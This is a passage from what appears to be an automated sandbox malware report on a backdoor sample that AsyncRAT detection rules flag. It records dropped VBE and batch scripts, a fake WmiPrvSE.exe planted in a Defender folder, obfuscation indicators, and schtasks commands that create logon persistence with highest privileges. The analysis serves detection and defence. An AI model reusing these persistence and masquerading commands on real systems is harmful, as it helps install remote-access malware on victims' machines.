Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Nov 2023 13:28:23 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Nov 2023 13:28:23 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1

                        System Summary

                        barindex
                        Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007D857B0_2_007D857B
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007D407E0_2_007D407E
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007FD00E0_2_007FD00E
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E70BF0_2_007E70BF
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_008011940_2_00801194
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F02F60_2_007F02F6
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DE2A00_2_007DE2A0
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007D32810_2_007D3281
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E66460_2_007E6646
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F473A0_2_007F473A
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F070E0_2_007F070E
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007D27E80_2_007D27E8
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E37C10_2_007E37C1
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DE8A00_2_007DE8A0
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DF9680_2_007DF968
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F49690_2_007F4969
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E6A7B0_2_007E6A7B
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E3A3C0_2_007E3A3C
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007FCB600_2_007FCB60
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F0B430_2_007F0B43
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E5C770_2_007E5C77
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E3D6D0_2_007E3D6D
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DED140_2_007DED14
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EFDFA0_2_007EFDFA
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DDE6C0_2_007DDE6C
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DBE130_2_007DBE13
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007F0F780_2_007F0F78
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007D5F3C0_2_007D5F3C
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeCode function: 4_2_00007FFD9BAD6C214_2_00007FFD9BAD6C21
                        Source: C:\PerfLogs\KQihinlofznONtA.exeCode function: 8_2_00007FFD9BAC6C218_2_00007FFD9BAC6C21
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 9_2_00007FFD9BAA6C219_2_00007FFD9BAA6C21
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeCode function: 14_2_00007FFD9BA96C2114_2_00007FFD9BA96C21
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 18_2_00007FFD9BAA6C2118_2_00007FFD9BAA6C21
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: String function: 007EE28C appears 35 times
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: String function: 007EE360 appears 52 times
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: String function: 007EED00 appears 31 times
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_007D718C
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1629131085.0000000004A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametelescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1627365578.0000000004954000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametelescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1628668977.0000000004A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametelescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeBinary or memory string: OriginalFilenametelescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeFile created: C:\Users\user\AppData\Roaming\Adobe\__tmp_rar_sfx_access_check_5700515Jump to behavior
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@24/15@1/1
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeFile read: C:\Windows\win.iniJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007D6EC9 GetLastError,FormatMessageW,0_2_007D6EC9
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007E9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_007E9E1C
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeReversingLabs: Detection: 68%
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeVirustotal: Detection: 65%
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeFile read: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\hui.exe C:\Users\user\AppData\Roaming\Adobe\hui.exe
                        Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f
                        Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\WmiPrvSE.exe'" /rl HIGHEST /f
                        Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe'" /rl HIGHEST /f
                        Source: unknownProcess created: C:\PerfLogs\KQihinlofznONtA.exe C:\PerfLogs\KQihinlofznONtA.exe
                        Source: unknownProcess created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\hui.exe "C:\Users\user\AppData\Roaming\Adobe\hui.exe"
                        Source: unknownProcess created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\hui.exe C:\Users\user\AppData\Roaming\Adobe\hui.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\hui.exe "C:\Users\user\AppData\Roaming\Adobe\hui.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeFile created: C:\Users\user\AppData\Local\Temp\ZsX5CNjlX7Jump to behavior
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeMutant created: \Sessions\1\BaseNamedObjects\303d53bec5b3d878433ce6218daf83749752600d
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCommand line argument: sfxname0_2_007ED5D4
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCommand line argument: sfxstime0_2_007ED5D4
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCommand line argument: STARTDLG0_2_007ED5D4
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, H7T6jwjmOx9lNTWdDxl.csCryptographic APIs: 'TransformBlock'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, H7T6jwjmOx9lNTWdDxl.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530ef5fd907494bc374d663924116cJump to behavior
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic file information: File size 1378916 > 1048576
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                        Data Obfuscation

                        barindex
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Gpf4LM6WPs4ZKoQlRJk.cs.Net Code: DHJSRoipckySQktYunk System.Reflection.Assembly.Load(byte[])
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, roXQDD62yvVnYwfS0CG.cs.Net Code: vD4v7eb5qpePcrZGfwA System.Reflection.Assembly.Load(byte[])
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EE28C push eax; ret 0_2_007EE2AA
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007ECAB5 push eax; retf 007Eh0_2_007ECACE
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EED46 push ecx; ret 0_2_007EED59
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeCode function: 4_2_00007FFD9BAD00BD pushad ; iretd 4_2_00007FFD9BAD00C1
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeCode function: 4_2_00007FFD9BADF788 pushfd ; iretd 4_2_00007FFD9BADF82A
                        Source: C:\PerfLogs\KQihinlofznONtA.exeCode function: 8_2_00007FFD9BAC00BD pushad ; iretd 8_2_00007FFD9BAC00C1
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 9_2_00007FFD9BAB3A70 push esi; retf 9_2_00007FFD9BAB3A97
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 9_2_00007FFD9BAA00BD pushad ; iretd 9_2_00007FFD9BAA00C1
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 9_2_00007FFD9BAAF788 pushfd ; iretd 9_2_00007FFD9BAAF82A
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeCode function: 14_2_00007FFD9BA900BD pushad ; iretd 14_2_00007FFD9BA900C1
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 18_2_00007FFD9BAA00BD pushad ; iretd 18_2_00007FFD9BAA00C1
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 18_2_00007FFD9BAAF7A0 pushfd ; iretd 18_2_00007FFD9BAAF82A
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 18_2_00007FFD9BAB3A70 push esi; retf 18_2_00007FFD9BAB3A97
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeFile created: C:\Users\user\AppData\Roaming\Adobe\__tmp_rar_sfx_access_check_5700515Jump to behavior
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hq0YaNpUVMMjnkwTKQb.csHigh entropy of concatenated method names: 'SgbGNgTVcRkVmQd0xdW', 'S3090dTWOjKE9dJmRry', 'LEO5PTT99akrZifvM3V', 'k2k8SDTlrZKX2KX9CNO', 'bmM2s7TxeGIL9SJoupH', 'pa8y8yT4f7JvmS1eFpI', 'xQ3MFxTcIWIULDuIum1', 'hd52W3TeAsXZYx5f06q'
